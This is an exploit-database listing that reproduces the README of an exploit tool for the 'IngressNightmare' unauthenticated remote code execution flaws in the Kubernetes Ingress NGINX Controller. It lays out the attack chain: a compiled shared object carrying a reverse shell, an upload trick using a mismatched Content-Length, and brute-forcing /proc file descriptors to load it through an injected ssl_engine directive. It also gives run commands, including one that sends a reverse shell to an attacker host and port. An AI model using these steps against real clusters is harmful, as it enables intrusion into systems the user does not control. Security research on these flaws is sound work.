Exploit for CVE-2025-1974 CVE-2025-1097 CVE-2025-1974 CVE-2025-24514 CVE-2025-1098

Name: Exploit for CVE-2025-1974 CVE-2025-1097 CVE-2025-1974 CVE-2025-24514 CVE-2025-1098
Rating: 5 (135 reviews)
2025-03-26 | CVSS 9.8
## https://sploitus.com/exploit?id=4955A569-D553-55C1-A765-0011835FE7B4
## Exploit for Ingress NGINX - IngressNightmare

This project provides an exploit targeting critical **unauthenticated Remote Code Execution (RCE)** vulnerabilities in the Ingress NGINX Controller for Kubernetes, collectively referred to as IngressNightmare.

In the original research, the Wiz team did not provide a PoC or a functional exploit, so we decided to create our own and share it with the community.

#### Overview

The Ingress NGINX Controller is a widely used component in Kubernetes environments, managing external access to services within clusters. Recent vulnerabilities (CVE-2025-1097, CVE-2025-1098, CVE-2025-24514, CVE-2025-1974) have highlighted critical security risks.

### **Exploit Workflow**

The exploit follows these main steps:

**Generate shared object** (used by the injected `ssl_engine` property):
*Compiles a .so library (evil_engine.so) containing reverse shell payload.*

**Upload the shared object**:
*Sends the compiled shared object to the ingress pod, leveraging request handling (client body buffers). The trick here is to send a different `Content-Length` to the server to keep the connection open.*

**Brute-force fd**:
*Iterates over process IDs and file descriptors (/proc/{pid}/fd/{fd}) to identify the correct descriptor referencing the uploaded object.*

Usage

Prerequisites:
- Python 3.x
- GCC compiler
- Python requests module

Run exploit:

`pip3 install -r requirements.txt`

`python3 exploit.py <ingress_url> <admission_webhook_url> [attacker_host:port](attacker_host:port)`

Ex: `python3 poc.py http://192.168.0.154 https://rke2-ingress-nginx-controller-admission.kube-system 192.168.1.63:443`

Sometimes the `admission webhook` is in a different namespace. In this case, you need to specify the namespace at the end, such as `kube-system`, `default`, or `ingress-nginx`.

- `<ingress_url>`: Target Ingress URL (public)
- `<admission_webhook_url>`: Admission webhook URL (internal webhook)
- `[attacker_host:port](attacker_host:port)`: Your host and port for reverse shell

**Disclaimer**

This exploit is provided strictly for educational and research purposes. Unauthorized use of this tool against targets without explicit permission is prohibited. Hakai Security and QuimeraX hold no responsibility for any misuse of this tool.